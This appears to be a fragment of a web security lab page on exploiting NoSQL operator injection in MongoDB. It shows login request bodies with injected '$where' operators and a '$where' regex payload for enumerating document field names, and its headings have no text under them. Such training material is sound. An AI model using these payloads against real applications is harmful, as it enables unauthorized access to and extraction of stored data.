Exploiting NoSQL operator injection to extract data
Exploiting NoSQL operator injection to extract data
Injecting operators in MongoDB
{"username":"wiener","password":"peter"}{"username":"wiener","password":"peter", "$where":"0"}{"username":"wiener","password":"peter", "$where":"1"}Extracting field names
"$where":"Object.keys(this)[0].match('^.{0}a.*')"Exfiltrating data using operators
Lab
Steps
Last updated